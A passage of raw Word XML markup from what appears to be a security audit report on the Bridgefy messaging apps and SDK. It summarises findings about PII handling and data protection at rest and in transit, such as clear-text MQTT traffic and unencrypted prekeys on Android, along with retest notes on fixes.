        <w:t>shared_prefs/com.google.firebase.auth.api.Store.[...].xml shared_prefs/com.google.android.gms.appid.xml databases/bridgefy-crypto.db</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="369"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>recommended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>extrapolate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>guidance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>offered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>under</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q02</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>referenced</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tickets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>above</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>resolve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="371"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>More broadly, a move to an architecture able to work</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>anonymous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>identifiers should be considered. The aim should be that Bridgefy has no knowledge, or at least not an easy way to map the remaining user PII to messaging metadata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250009" w:id="46"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-Q05:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>How</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>protects</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Rest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Transit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Proven</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="377"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The Bridgefy team resolved </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-012</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-033</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-040</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and 7ASecurity verified that the fixes are valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>summarizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>answer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>question:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apps,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>servers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>protect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>appropriately</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>rest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>transit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="370"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>For the sake of brevity, possible improvements to protect Bridgefy PII at rest and in transit are provided in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q04</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. Regarding other type of information, the Bridgefy web app, mobile apps, and SDK were found to have room for improvement in terms of protecting data at rest and in transit as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="372" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Encrypted messages sent from one user to another are sent through the MQTT broker via clear-text MQTT traffic (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-012</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="364" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Broadcast and direct messages, prekeys, and alternative information could be leaked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>attackers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>physical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>device</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>due</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>failure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>leverage the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>appropriate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>features</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-037</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>well as through iOS backups (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-040</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="365" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>One-time-prekeys, signed-prekeys, and identities were found to be unencrypted at rest in the Android device (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-031</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
